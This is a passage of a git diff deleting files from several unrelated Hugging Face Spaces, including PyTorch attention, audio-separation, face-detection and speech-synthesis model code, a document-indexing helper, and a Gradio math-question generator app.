c, attn_mask=None): - q = self.conv_q(x) - k = self.conv_k(c) - v = self.conv_v(c) - - x, self.attn = self.attention(q, k, v, mask=attn_mask) - - x = self.conv_o(x) - return x - - def attention(self, query, key, value, mask=None): - # reshape [b, d, t] -> [b, n_h, t, d_k] - b, d, t_s, t_t = (*key.size(), query.size(2)) - query = query.view(b, self.n_heads, self.k_channels, t_t).transpose(2, 3) - key = key.view(b, self.n_heads, self.k_channels, t_s).transpose(2, 3) - value = value.view(b, self.n_heads, self.k_channels, t_s).transpose(2, 3) - - scores = torch.matmul(query / math.sqrt(self.k_channels), key.transpose(-2, -1)) - if self.window_size is not None: - assert t_s == t_t, "Relative attention is only available for self-attention." - key_relative_embeddings = self._get_relative_embeddings(self.emb_rel_k, t_s) - rel_logits = self._matmul_with_relative_keys(query /math.sqrt(self.k_channels), key_relative_embeddings) - scores_local = self._relative_position_to_absolute_position(rel_logits) - scores = scores + scores_local - if self.proximal_bias: - assert t_s == t_t, "Proximal bias is only available for self-attention." - scores = scores + self._attention_bias_proximal(t_s).to(device=scores.device, dtype=scores.dtype) - if mask is not None: - scores = scores.masked_fill(mask == 0, -1e4) - if self.block_length is not None: - assert t_s == t_t, "Local attention is only available for self-attention." - block_mask = torch.ones_like(scores).triu(-self.block_length).tril(self.block_length) - scores = scores.masked_fill(block_mask == 0, -1e4) - p_attn = F.softmax(scores, dim=-1) # [b, n_h, t_t, t_s] - p_attn = self.drop(p_attn) - output = torch.matmul(p_attn, value) - if self.window_size is not None: - relative_weights = self._absolute_position_to_relative_position(p_attn) - value_relative_embeddings = self._get_relative_embeddings(self.emb_rel_v, t_s) - output = output + self._matmul_with_relative_values(relative_weights, value_relative_embeddings) - output = output.transpose(2, 3).contiguous().view(b, d, t_t) # [b, n_h, t_t, d_k] -> [b, d, t_t] - return output, p_attn - - def _matmul_with_relative_values(self, x, y): - """ - x: [b, h, l, m] - y: [h or 1, m, d] - ret: [b, h, l, d] - """ - ret = torch.matmul(x, y.unsqueeze(0)) - return ret - - def _matmul_with_relative_keys(self, x, y): - """ - x: [b, h, l, d] - y: [h or 1, m, d] - ret: [b, h, l, m] - """ - ret = torch.matmul(x, y.unsqueeze(0).transpose(-2, -1)) - return ret - - def _get_relative_embeddings(self, relative_embeddings, length): - max_relative_position = 2 * self.window_size + 1 - # Pad first before slice to avoid using cond ops. - pad_length = max(length - (self.window_size + 1), 0) - slice_start_position = max((self.window_size + 1) - length, 0) - slice_end_position = slice_start_position + 2 * length - 1 - if pad_length > 0: - padded_relative_embeddings = F.pad( - relative_embeddings, - commons.convert_pad_shape([[0, 0], [pad_length, pad_length], [0, 0]])) - else: - padded_relative_embeddings = relative_embeddings - used_relative_embeddings = padded_relative_embeddings[:,slice_start_position:slice_end_position] - return used_relative_embeddings - - def _relative_position_to_absolute_position(self, x): - """ - x: [b, h, l, 2*l-1] - ret: [b, h, l, l] - """ - batch, heads, length, _ = x.size() - # Concat columns of pad to shift from relative to absolute indexing. - x = F.pad(x, commons.convert_pad_shape([[0,0],[0,0],[0,0],[0,1]])) - - # Concat extra elements so to add up to shape (len+1, 2*len-1). - x_flat = x.view([batch, heads, length * 2 * length]) - x_flat = F.pad(x_flat, commons.convert_pad_shape([[0,0],[0,0],[0,length-1]])) - - # Reshape and slice out the padded elements. - x_final = x_flat.view([batch, heads, length+1, 2*length-1])[:, :, :length, length-1:] - return x_final - - def _absolute_position_to_relative_position(self, x): - """ - x: [b, h, l, l] - ret: [b, h, l, 2*l-1] - """ - batch, heads, length, _ = x.size() - # padd along column - x = F.pad(x, commons.convert_pad_shape([[0, 0], [0, 0], [0, 0], [0, length-1]])) - x_flat = x.view([batch, heads, length**2 + length*(length -1)]) - # add 0's in the beginning that will skew the elements after reshape - x_flat = F.pad(x_flat, commons.convert_pad_shape([[0, 0], [0, 0], [length, 0]])) - x_final = x_flat.view([batch, heads, length, 2*length])[:,:,:,1:] - return x_final - - def _attention_bias_proximal(self, length): - """Bias for self-attention to encourage attention to close positions. - Args: - length: an integer scalar. - Returns: - a Tensor with shape [1, 1, length, length] - """ - r = torch.arange(length, dtype=torch.float32) - diff = torch.unsqueeze(r, 0) - torch.unsqueeze(r, 1) - return torch.unsqueeze(torch.unsqueeze(-torch.log1p(torch.abs(diff)), 0), 0) - - -class FFN(nn.Module): - def __init__(self, in_channels, out_channels, filter_channels, kernel_size, p_dropout=0., activation=None, causal=False): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.filter_channels = filter_channels - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.activation = activation - self.causal = causal - - if causal: - self.padding = self._causal_padding - else: - self.padding = self._same_padding - - self.conv_1 = nn.Conv1d(in_channels, filter_channels, kernel_size) - self.conv_2 = nn.Conv1d(filter_channels, out_channels, kernel_size) - self.drop = nn.Dropout(p_dropout) - - def forward(self, x, x_mask): - x = self.conv_1(self.padding(x * x_mask)) - if self.activation == "gelu": - x = x * torch.sigmoid(1.702 * x) - else: - x = torch.relu(x) - x = self.drop(x) - x = self.conv_2(self.padding(x * x_mask)) - return x * x_mask - - def _causal_padding(self, x): - if self.kernel_size == 1: - return x - pad_l = self.kernel_size - 1 - pad_r = 0 - padding = [[0, 0], [0, 0], [pad_l, pad_r]] - x = F.pad(x, commons.convert_pad_shape(padding)) - return x - - def _same_padding(self, x): - if self.kernel_size == 1: - return x - pad_l = (self.kernel_size - 1) // 2 - pad_r = self.kernel_size // 2 - padding = [[0, 0], [0, 0], [pad_l, pad_r]] - x = F.pad(x, commons.convert_pad_shape(padding)) - return x diff --git a/spaces/Intoval/privateChatGPT/modules/llama_func.py b/spaces/Intoval/privateChatGPT/modules/llama_func.py deleted file mode 100644 index aec202a851c8ec51d1a96ce23320919af0d22a95..0000000000000000000000000000000000000000 --- a/spaces/Intoval/privateChatGPT/modules/llama_func.py +++ /dev/null @@ -1,166 +0,0 @@ -import os -import logging - -from llama_index import download_loader -from llama_index import ( - Document, - LLMPredictor, - PromptHelper, - QuestionAnswerPrompt, - RefinePrompt, -) -import colorama -import PyPDF2 -from tqdm import tqdm - -from modules.presets import * -from modules.utils import * -from modules.config import local_embedding - - -def get_index_name(file_src): - file_paths = [x.name for x in file_src] - file_paths.sort(key=lambda x: os.path.basename(x)) - - md5_hash = hashlib.md5() - for file_path in file_paths: - with open(file_path, "rb") as f: - while chunk := f.read(8192): - md5_hash.update(chunk) - - return md5_hash.hexdigest() - - -def block_split(text): - blocks = [] - while len(text) > 0: - blocks.append(Document(text[:1000])) - text = text[1000:] - return blocks - - -def get_documents(file_src): - documents = [] - logging.debug("Loading documents...") - logging.debug(f"file_src: {file_src}") - for file in file_src: - filepath = file.name - filename = os.path.basename(filepath) - file_type = os.path.splitext(filepath)[1] - logging.info(f"loading file: {filename}") - try: - if file_type == ".pdf": - logging.debug("Loading PDF...") - try: - from modules.pdf_func import parse_pdf - from modules.config import advance_docs - - two_column = advance_docs["pdf"].get("two_column", False) - pdftext = parse_pdf(filepath, two_column).text - except: - pdftext = "" - with open(filepath, "rb") as pdfFileObj: - pdfReader = PyPDF2.PdfReader(pdfFileObj) - for page in tqdm(pdfReader.pages): - pdftext += page.extract_text() - text_raw = pdftext - elif file_type == ".docx": - logging.debug("Loading Word...") - DocxReader = download_loader("DocxReader") - loader = DocxReader() - text_raw = loader.load_data(file=filepath)[0].text - elif file_type == ".epub": - logging.debug("Loading EPUB...") - EpubReader = download_loader("EpubReader") - loader = EpubReader() - text_raw = loader.load_data(file=filepath)[0].text - elif file_type == ".xlsx": - logging.debug("Loading Excel...") - text_list = excel_to_string(filepath) - for elem in text_list: - documents.append(Document(elem)) - continue - else: - logging.debug("Loading text file...") - with open(filepath, "r", encoding="utf-8") as f: - text_raw = f.read() - except Exception as e: - logging.error(f"Error loading file: {filename}") - pass - text = add_space(text_raw) - # text = block_split(text) - # documents += text - documents += [Document(text)] - logging.debug("Documents loaded.") - return documents - - -def construct_index( - api_key, - file_src, - max_input_size=4096, - num_outputs=5, - max_chunk_overlap=20, - chunk_size_limit=600, - embedding_limit=None, - separator=" ", -): - from langchain.chat_models import ChatOpenAI - from langchain.embeddings.huggingface import HuggingFaceEmbeddings - from llama_index import GPTSimpleVectorIndex, ServiceContext, LangchainEmbedding, OpenAIEmbedding - - if api_key: - os.environ["OPENAI_API_KEY"] = api_key - else: - # 由于一个依赖的愚蠢的设计,这里必须要有一个API KEY - os.environ["OPENAI_API_KEY"] = "sk-xxxxxxx" - chunk_size_limit = None if chunk_size_limit == 0 else chunk_size_limit - embedding_limit = None if embedding_limit == 0 else embedding_limit - separator = " " if separator == "" else separator - - prompt_helper = PromptHelper( - max_input_size=max_input_size, - num_output=num_outputs, - max_chunk_overlap=max_chunk_overlap, - embedding_limit=embedding_limit, - chunk_size_limit=600, - separator=separator, - ) - index_name = get_index_name(file_src) - if os.path.exists(f"./index/{index_name}.json"): - logging.info("找到了缓存的索引文件,加载中……") - return GPTSimpleVectorIndex.load_from_disk(f"./index/{index_name}.json") - else: - try: - documents = get_documents(file_src) - if local_embedding: - embed_model = LangchainEmbedding(HuggingFaceEmbeddings()) - else: - embed_model = OpenAIEmbedding() - logging.info("构建索引中……") - with retrieve_proxy(): - service_context = ServiceContext.from_defaults( - prompt_helper=prompt_helper, - chunk_size_limit=chunk_size_limit, - embed_model=embed_model, - ) - index = GPTSimpleVectorIndex.from_documents( - documents, service_context=service_context - ) - logging.debug("索引构建完成!") - os.makedirs("./index", exist_ok=True) - index.save_to_disk(f"./index/{index_name}.json") - logging.debug("索引已保存至本地!") - return index - - except Exception as e: - logging.error("索引构建失败!", e) - print(e) - return None - - -def add_space(text): - punctuations = {",": ", ", "。": "。 ", "?": "? ", "!": "! ", ":": ": ", ";": "; "} - for cn_punc, en_punc in punctuations.items(): - text = text.replace(cn_punc, en_punc) - return text diff --git a/spaces/Izumazu/ProxyTest/README.md b/spaces/Izumazu/ProxyTest/README.md deleted file mode 100644 index 26e7de60e5441bd41cd2353833d9615b6924f913..0000000000000000000000000000000000000000 --- a/spaces/Izumazu/ProxyTest/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: ProxyTest -emoji: 📉 -colorFrom: blue -colorTo: red -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/JUNGU/VToonify/vtoonify/model/raft/core/utils/utils.py b/spaces/JUNGU/VToonify/vtoonify/model/raft/core/utils/utils.py deleted file mode 100644 index 741ccfe4d0d778c3199c586d368edc2882d4fff8..0000000000000000000000000000000000000000 --- a/spaces/JUNGU/VToonify/vtoonify/model/raft/core/utils/utils.py +++ /dev/null @@ -1,82 +0,0 @@ -import torch -import torch.nn.functional as F -import numpy as np -from scipy import interpolate - - -class InputPadder: - """ Pads images such that dimensions are divisible by 8 """ - def __init__(self, dims, mode='sintel'): - self.ht, self.wd = dims[-2:] - pad_ht = (((self.ht // 8) + 1) * 8 - self.ht) % 8 - pad_wd = (((self.wd // 8) + 1) * 8 - self.wd) % 8 - if mode == 'sintel': - self._pad = [pad_wd//2, pad_wd - pad_wd//2, pad_ht//2, pad_ht - pad_ht//2] - else: - self._pad = [pad_wd//2, pad_wd - pad_wd//2, 0, pad_ht] - - def pad(self, *inputs): - return [F.pad(x, self._pad, mode='replicate') for x in inputs] - - def unpad(self,x): - ht, wd = x.shape[-2:] - c = [self._pad[2], ht-self._pad[3], self._pad[0], wd-self._pad[1]] - return x[..., c[0]:c[1], c[2]:c[3]] - -def forward_interpolate(flow): - flow = flow.detach().cpu().numpy() - dx, dy = flow[0], flow[1] - - ht, wd = dx.shape - x0, y0 = np.meshgrid(np.arange(wd), np.arange(ht)) - - x1 = x0 + dx - y1 = y0 + dy - - x1 = x1.reshape(-1) - y1 = y1.reshape(-1) - dx = dx.reshape(-1) - dy = dy.reshape(-1) - - valid = (x1 > 0) & (x1 < wd) & (y1 > 0) & (y1 < ht) - x1 = x1[valid] - y1 = y1[valid] - dx = dx[valid] - dy = dy[valid] - - flow_x = interpolate.griddata( - (x1, y1), dx, (x0, y0), method='nearest', fill_value=0) - - flow_y = interpolate.griddata( - (x1, y1), dy, (x0, y0), method='nearest', fill_value=0) - - flow = np.stack([flow_x, flow_y], axis=0) - return torch.from_numpy(flow).float() - - -def bilinear_sampler(img, coords, mode='bilinear', mask=False): - """ Wrapper for grid_sample, uses pixel coordinates """ - H, W = img.shape[-2:] - xgrid, ygrid = coords.split([1,1], dim=-1) - xgrid = 2*xgrid/(W-1) - 1 - ygrid = 2*ygrid/(H-1) - 1 - - grid = torch.cat([xgrid, ygrid], dim=-1) - img = F.grid_sample(img, grid, align_corners=True) - - if mask: - mask = (xgrid > -1) & (ygrid > -1) & (xgrid < 1) & (ygrid < 1) - return img, mask.float() - - return img - - -def coords_grid(batch, ht, wd, device): - coords = torch.meshgrid(torch.arange(ht, device=device), torch.arange(wd, device=device)) - coords = torch.stack(coords[::-1], dim=0).float() - return coords[None].repeat(batch, 1, 1, 1) - - -def upflow8(flow, mode='bilinear'): - new_size = (8 * flow.shape[2], 8 * flow.shape[3]) - return 8 * F.interpolate(flow, size=new_size, mode=mode, align_corners=True) diff --git a/spaces/JasonData/MathGenerator/app.py b/spaces/JasonData/MathGenerator/app.py deleted file mode 100644 index 8b655f1a8b8f34f0fa2fc7a26ef8787f394b3898..0000000000000000000000000000000000000000 --- a/spaces/JasonData/MathGenerator/app.py +++ /dev/null @@ -1,109 +0,0 @@ -import openai -import gradio as gr -import os - -STARTING_PROMPT = [{"role": "user", "content": """You are a math question generator. For each question, I will provide you with 4 things: - 1. the main topic to be tested, 2. the types of question type, 3. the difficulty level, and 4. the required skillsets to solve the question. - You will then reply with appropriate math question as well as the step by step solution for the question. Reply in Four parts. - 1. Question Information: - Topic(s) Tested: ... - Question Type: ... - Difficulty Level: ... - Skills required: ... - Case Study: True/False - - 2. Question: .... - - 3. Step by Step Solution: ... - - 4. Final answer(s): ..."""}, - {"role": "assistant", "content": f"OK"}] - -openai.api_key = os.environ['OPENAI'] - - -def predict(input, msg_history=STARTING_PROMPT): - msg_history.append({"role": "user", "content": f"{input}"}) - print(msg_history) - - completion = openai.ChatCompletion.create(model="gpt-3.5-turbo", messages=msg_history, temperature=0.8) - response = completion.choices[0].message.content - msg_history.append({"role": "assistant", "content": f"{response}"}) - - return [response, msg_history] - - -def prompt_builder_predict(questionType=None, difficulty=0, topic=None, prerequisites=None, caseStudy=False, additionalPrompt=None, msg_history=STARTING_PROMPT, latex=False): - - level = ['Very Easy', 'Easy', 'Medium', 'Difficult', 'Extremely Difficult'] - prompt = 'randomly generatate a math question ' - if topic: - prompt = prompt + f'on the topic of {topic}. ' - if difficulty: - prompt = prompt + f'The difficulty level of the question should be: {level[difficulty-1]}, which means that it must require at least {difficulty} steps to solve. ' - if questionType: - prompt = prompt + f'The question type should be in {questionType} format. ' - if prerequisites: - prompt = prompt + f"This question will require to use the following methods to solve: {' and '.join(prerequisites)}. " - if caseStudy: - prompt = prompt + 'This question must be in the form of case study where it tries to test the application of the topic in the real life scenario. ' - if latex: - prompt = prompt + 'Display all mathematical equation parts of the question to LaTeX format. ' - if additionalPrompt: - prompt = prompt + f"In addition, {additionalPrompt}." - - return predict(prompt, msg_history) - - -with gr.Blocks() as demo: - - msg_history = gr.State(STARTING_PROMPT) - - gr.Markdown( - """ - # Math Question Generator - This webapp demostrates an API plugin that can be used with LearningANTs to generate questions. The response will contain three parts: [Question, Step by Step Solution, Final answer]. - """) - - with gr.Row(): - questionType = gr.Radio(["MCQ", "True or False", "Short Response"], value='Short Response', label="Question Type") - difficulty = gr.Slider(1, 5, value=3, step=1, label="Difficult Level", info="Choose between 1 and 5") - with gr.Row(): - topic = gr.Dropdown(["Simultaneous Equation", "Linear Equation", "Derivatives", "Integrals", "Optimization"], value='Simultaneous Equation', label="Main Testing Topic") - prerequisites = gr.Dropdown(["Elimination", "Subsitution", "Linear Equation", "Algebra", "Geometry", "Trigonometry", "Logarithms", "Power Rule", "Sum Rule", 'Difference Rule', "Product Rule", "Quotient Rule", 'Reciprocal Rule', "Chain Rule", "Implicit Differentiation", "Logarithmic Differentiation"], multiselect=True, interactive=True, label="Prerequisite Topics") - - with gr.Row(): - caseStudy = gr.Checkbox(label="Case Study", info="Does this question test the application of theory in real life scenarios?") - latex = gr.Checkbox(label="LaTeX", value=True, info="Display all equations in LaTeX format?") - - additionalInfo = gr.Textbox(label="Additional information (prompt)", placeholder="Give a scenario where Jim and John are working in a garden....") - - gen_btn = gr.Button("Generate A New Question") - - with gr.Row(): - question = gr.TextArea(label="Generated Question") - - gen_btn.click(fn=prompt_builder_predict, inputs = [questionType, difficulty, topic, prerequisites, caseStudy, additionalInfo, msg_history, latex], outputs= [question, msg_history]) - - with gr.Row(): - prompt = gr.Textbox(label='Additional Prompt', info='Not satified with the result? Enter instructions to modify the question.', placeholder='Include the case study of....', visible=False) - - with gr.Row(): - modify_btn = gr.Button('Modify Question', visible=False) - modify_btn.click(fn=predict, inputs = [prompt, msg_history], outputs= [question, msg_history]) - - - # restart_btn = gr.Button("Generate Another Question", visible=False) - - - def show_display(): - return gr.update(visible=True) - def hide_display(): - return gr.update(visible=False) - def clear_value(): - return gr.update(value='') - - question.change(fn=show_display, outputs=prompt) - question.change(fn=show_display, outputs=modify_btn) - -demo.launch( share=False) \ No newline at end of file diff --git a/spaces/Jdnsn/Alexander/README.md b/spaces/Jdnsn/Alexander/README.md deleted file mode 100644 index 88afff7444a3655c34e6a9375a6aba9118f755d1..0000000000000000000000000000000000000000 --- a/spaces/Jdnsn/Alexander/README.md +++ /dev/null @@ -1,10 +0,0 @@ ---- -title: Alexander -emoji: 👀 -colorFrom: blue -colorTo: yellow -sdk: docker -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Kamtera/Persian_Automatic_Speech_Recognition_and-more/README.md b/spaces/Kamtera/Persian_Automatic_Speech_Recognition_and-more/README.md deleted file mode 100644 index 002f78c8c984c65b9bbf95a2eb2a8df9536aad56..0000000000000000000000000000000000000000 --- a/spaces/Kamtera/Persian_Automatic_Speech_Recognition_and-more/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Multilingual Automatic Speech Recognition-56lang -emoji: ⚡ -colorFrom: gray -colorTo: gray -sdk: gradio -sdk_version: 3.3.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Kangarroar/ApplioRVC-Inference/lib/uvr5_pack/lib_v5/nets_33966KB.py b/spaces/Kangarroar/ApplioRVC-Inference/lib/uvr5_pack/lib_v5/nets_33966KB.py deleted file mode 100644 index b8986f968dc5383e65d35aac6e4367299de3378b..0000000000000000000000000000000000000000 --- a/spaces/Kangarroar/ApplioRVC-Inference/lib/uvr5_pack/lib_v5/nets_33966KB.py +++ /dev/null @@ -1,122 +0,0 @@ -import torch -from torch import nn -import torch.nn.functional as F - -from . import layers_33966KB as layers - - -class BaseASPPNet(nn.Module): - def __init__(self, nin, ch, dilations=(4, 8, 16, 32)): - super(BaseASPPNet, self).__init__() - self.enc1 = layers.Encoder(nin, ch, 3, 2, 1) - self.enc2 = layers.Encoder(ch, ch * 2, 3, 2, 1) - self.enc3 = layers.Encoder(ch * 2, ch * 4, 3, 2, 1) - self.enc4 = layers.Encoder(ch * 4, ch * 8, 3, 2, 1) - - self.aspp = layers.ASPPModule(ch * 8, ch * 16, dilations) - - self.dec4 = layers.Decoder(ch * (8 + 16), ch * 8, 3, 1, 1) - self.dec3 = layers.Decoder(ch * (4 + 8), ch * 4, 3, 1, 1) - self.dec2 = layers.Decoder(ch * (2 + 4), ch * 2, 3, 1, 1) - self.dec1 = layers.Decoder(ch * (1 + 2), ch, 3, 1, 1) - - def __call__(self, x): - h, e1 = self.enc1(x) - h, e2 = self.enc2(h) - h, e3 = self.enc3(h) - h, e4 = self.enc4(h) - - h = self.aspp(h) - - h = self.dec4(h, e4) - h = self.dec3(h, e3) - h = self.dec2(h, e2) - h = self.dec1(h, e1) - - return h - - -class CascadedASPPNet(nn.Module): - def __init__(self, n_fft): - super(CascadedASPPNet, self).__init__() - self.stg1_low_band_net = BaseASPPNet(2, 16) - self.stg1_high_band_net = BaseASPPNet(2, 16) - - self.stg2_bridge = layers.Conv2DBNActiv(18, 8, 1, 1, 0) - self.stg2_full_band_net = BaseASPPNet(8, 16) - - self.stg3_bridge = layers.Conv2DBNActiv(34, 16, 1, 1, 0) - self.stg3_full_band_net = BaseASPPNet(16, 32) - - self.out = nn.Conv2d(32, 2, 1, bias=False) - self.aux1_out = nn.Conv2d(16, 2, 1, bias=False) - self.aux2_out = nn.Conv2d(16, 2, 1, bias=False) - - self.max_bin = n_fft // 2 - self.output_bin = n_fft // 2 + 1 - - self.offset = 128 - - def forward(self, x, aggressiveness=None): - mix = x.detach() - x = x.clone() - - x = x[:, :, : self.max_bin] - - bandw = x.size()[2] // 2 - aux1 = torch.cat( - [ - self.stg1_low_band_net(x[:, :, :bandw]), - self.stg1_high_band_net(x[:, :, bandw:]), - ], - dim=2, - ) - - h = torch.cat([x, aux1], dim=1) - aux2 = self.stg2_full_band_net(self.stg2_bridge(h)) - - h = torch.cat([x, aux1, aux2], dim=1) - h = self.stg3_full_band_net(self.stg3_bridge(h)) - - mask = torch.sigmoid(self.out(h)) - mask = F.pad( - input=mask, - pad=(0, 0, 0, self.output_bin - mask.size()[2]), - mode="replicate", - ) - - if self.training: - aux1 = torch.sigmoid(self.aux1_out(aux1)) - aux1 = F.pad( - input=aux1, - pad=(0, 0, 0, self.output_bin - aux1.size()[2]), - mode="replicate", - ) - aux2 = torch.sigmoid(self.aux2_out(aux2)) - aux2 = F.pad( - input=aux2, - pad=(0, 0, 0, self.output_bin - aux2.size()[2]), - mode="replicate", - ) - return mask * mix, aux1 * mix, aux2 * mix - else: - if aggressiveness: - mask[:, :, : aggressiveness["split_bin"]] = torch.pow( - mask[:, :, : aggressiveness["split_bin"]], - 1 + aggressiveness["value"] / 3, - ) - mask[:, :, aggressiveness["split_bin"] :] = torch.pow( - mask[:, :, aggressiveness["split_bin"] :], - 1 + aggressiveness["value"], - ) - - return mask * mix - - def predict(self, x_mag, aggressiveness=None): - h = self.forward(x_mag, aggressiveness) - - if self.offset > 0: - h = h[:, :, :, self.offset : -self.offset] - assert h.size()[3] > 0 - - return h diff --git a/spaces/KenjieDec/GPEN/retinaface/facemodels/net.py b/spaces/KenjieDec/GPEN/retinaface/facemodels/net.py deleted file mode 100644 index beb6040b24258f8b96020c1c9fc2610819718017..0000000000000000000000000000000000000000 --- a/spaces/KenjieDec/GPEN/retinaface/facemodels/net.py +++ /dev/null @@ -1,137 +0,0 @@ -import time -import torch -import torch.nn as nn -import torchvision.models._utils as _utils -import torchvision.models as models -import torch.nn.functional as F -from torch.autograd import Variable - -def conv_bn(inp, oup, stride = 1, leaky = 0): - return nn.Sequential( - nn.Conv2d(inp, oup, 3, stride, 1, bias=False), - nn.BatchNorm2d(oup), - nn.LeakyReLU(negative_slope=leaky, inplace=True) - ) - -def conv_bn_no_relu(inp, oup, stride): - return nn.Sequential( - nn.Conv2d(inp, oup, 3, stride, 1, bias=False), - nn.BatchNorm2d(oup), - ) - -def conv_bn1X1(inp, oup, stride, leaky=0): - return nn.Sequential( - nn.Conv2d(inp, oup, 1, stride, padding=0, bias=False), - nn.BatchNorm2d(oup), - nn.LeakyReLU(negative_slope=leaky, inplace=True) - ) - -def conv_dw(inp, oup, stride, leaky=0.1): - return nn.Sequential( - nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False), - nn.BatchNorm2d(inp), - nn.LeakyReLU(negative_slope= leaky,inplace=True), - - nn.Conv2d(inp, oup, 1, 1, 0, bias=False), - nn.BatchNorm2d(oup), - nn.LeakyReLU(negative_slope= leaky,inplace=True), - ) - -class SSH(nn.Module): - def __init__(self, in_channel, out_channel): - super(SSH, self).__init__() - assert out_channel % 4 == 0 - leaky = 0 - if (out_channel <= 64): - leaky = 0.1 - self.conv3X3 = conv_bn_no_relu(in_channel, out_channel//2, stride=1) - - self.conv5X5_1 = conv_bn(in_channel, out_channel//4, stride=1, leaky = leaky) - self.conv5X5_2 = conv_bn_no_relu(out_channel//4, out_channel//4, stride=1) - - self.conv7X7_2 = conv_bn(out_channel//4, out_channel//4, stride=1, leaky = leaky) - self.conv7x7_3 = conv_bn_no_relu(out_channel//4, out_channel//4, stride=1) - - def forward(self, input): - conv3X3 = self.conv3X3(input) - - conv5X5_1 = self.conv5X5_1(input) - conv5X5 = self.conv5X5_2(conv5X5_1) - - conv7X7_2 = self.conv7X7_2(conv5X5_1) - conv7X7 = self.conv7x7_3(conv7X7_2) - - out = torch.cat([conv3X3, conv5X5, conv7X7], dim=1) - out = F.relu(out) - return out - -class FPN(nn.Module): - def __init__(self,in_channels_list,out_channels): - super(FPN,self).__init__() - leaky = 0 - if (out_channels <= 64): - leaky = 0.1 - self.output1 = conv_bn1X1(in_channels_list[0], out_channels, stride = 1, leaky = leaky) - self.output2 = conv_bn1X1(in_channels_list[1], out_channels, stride = 1, leaky = leaky) - self.output3 = conv_bn1X1(in_channels_list[2], out_channels, stride = 1, leaky = leaky) - - self.merge1 = conv_bn(out_channels, out_channels, leaky = leaky) - self.merge2 = conv_bn(out_channels, out_channels, leaky = leaky) - - def forward(self, input): - # names = list(input.keys()) - input = list(input.values()) - - output1 = self.output1(input[0]) - output2 = self.output2(input[1]) - output3 = self.output3(input[2]) - - up3 = F.interpolate(output3, size=[output2.size(2), output2.size(3)], mode="nearest") - output2 = output2 + up3 - output2 = self.merge2(output2) - - up2 = F.interpolate(output2, size=[output1.size(2), output1.size(3)], mode="nearest") - output1 = output1 + up2 - output1 = self.merge1(output1) - - out = [output1, output2, output3] - return out - - - -class MobileNetV1(nn.Module): - def __init__(self): - super(MobileNetV1, self).__init__() - self.stage1 = nn.Sequential( - conv_bn(3, 8, 2, leaky = 0.1), # 3 - conv_dw(8, 16, 1), # 7 - conv_dw(16, 32, 2), # 11 - conv_dw(32, 32, 1), # 19 - conv_dw(32, 64, 2), # 27 - conv_dw(64, 64, 1), # 43 - ) - self.stage2 = nn.Sequential( - conv_dw(64, 128, 2), # 43 + 16 = 59 - conv_dw(128, 128, 1), # 59 + 32 = 91 - conv_dw(128, 128, 1), # 91 + 32 = 123 - conv_dw(128, 128, 1), # 123 + 32 = 155 - conv_dw(128, 128, 1), # 155 + 32 = 187 - conv_dw(128, 128, 1), # 187 + 32 = 219 - ) - self.stage3 = nn.Sequential( - conv_dw(128, 256, 2), # 219 +3 2 = 241 - conv_dw(256, 256, 1), # 241 + 64 = 301 - ) - self.avg = nn.AdaptiveAvgPool2d((1,1)) - self.fc = nn.Linear(256, 1000) - - def forward(self, x): - x = self.stage1(x) - x = self.stage2(x) - x = self.stage3(x) - x = self.avg(x) - # x = self.model(x) - x = x.view(-1, 256) - x = self.fc(x) - return x - diff --git a/spaces/Kevin676/Clone-Your-Voice/synthesizer/train.py b/spaces/Kevin676/Clone-Your-Voice/synthesizer/train.py deleted file mode 100644 index d8cc170c415a6f56703dfee23f89a3c9d06511fa..0000000000000000000000000000000000000000 --- a/spaces/Kevin676/Clone-Your-Voice/synthesizer/train.py +++ /dev/null @@ -1,258 +0,0 @@ -from datetime import datetime -from functools import partial -from pathlib import Path - -import torch -import torch.nn.functional as F -from torch import optim -from torch.utils.data import DataLoader - -from synthesizer import audio -from synthesizer.models.tacotron import Tacotron -from synthesizer.synthesizer_dataset import SynthesizerDataset, collate_synthesizer -from synthesizer.utils import ValueWindow, data_parallel_workaround -from synthesizer.utils.plot import plot_spectrogram -from synthesizer.utils.symbols import symbols -from synthesizer.utils.text import sequence_to_text -from vocoder.display import * - - -def np_now(x: torch.Tensor): return x.detach().cpu().numpy() - - -def time_string(): - return datetime.now().strftime("%Y-%m-%d %H:%M") - - -def train(run_id: str, syn_dir: Path, models_dir: Path, save_every: int, backup_every: int, force_restart: bool, - hparams): - models_dir.mkdir(exist_ok=True) - - model_dir = models_dir.joinpath(run_id) - plot_dir = model_dir.joinpath("plots") - wav_dir = model_dir.joinpath("wavs") - mel_output_dir = model_dir.joinpath("mel-spectrograms") - meta_folder = model_dir.joinpath("metas") - model_dir.mkdir(exist_ok=True) - plot_dir.mkdir(exist_ok=True) - wav_dir.mkdir(exist_ok=True) - mel_output_dir.mkdir(exist_ok=True) - meta_folder.mkdir(exist_ok=True) - - weights_fpath = model_dir / f"synthesizer.pt" - metadata_fpath = syn_dir.joinpath("train.txt") - - print("Checkpoint path: {}".format(weights_fpath)) - print("Loading training data from: {}".format(metadata_fpath)) - print("Using model: Tacotron") - - # Bookkeeping - time_window = ValueWindow(100) - loss_window = ValueWindow(100) - - # From WaveRNN/train_tacotron.py - if torch.cuda.is_available(): - device = torch.device("cuda") - - for session in hparams.tts_schedule: - _, _, _, batch_size = session - if batch_size % torch.cuda.device_count() != 0: - raise ValueError("`batch_size` must be evenly divisible by n_gpus!") - else: - device = torch.device("cpu") - print("Using device:", device) - - # Instantiate Tacotron Model - print("\nInitialising Tacotron Model...\n") - model = Tacotron(embed_dims=hparams.tts_embed_dims, - num_chars=len(symbols), - encoder_dims=hparams.tts_encoder_dims, - decoder_dims=hparams.tts_decoder_dims, - n_mels=hparams.num_mels, - fft_bins=hparams.num_mels, - postnet_dims=hparams.tts_postnet_dims, - encoder_K=hparams.tts_encoder_K, - lstm_dims=hparams.tts_lstm_dims, - postnet_K=hparams.tts_postnet_K, - num_highways=hparams.tts_num_highways, - dropout=hparams.tts_dropout, - stop_threshold=hparams.tts_stop_threshold, - speaker_embedding_size=hparams.speaker_embedding_size).to(device) - - # Initialize the 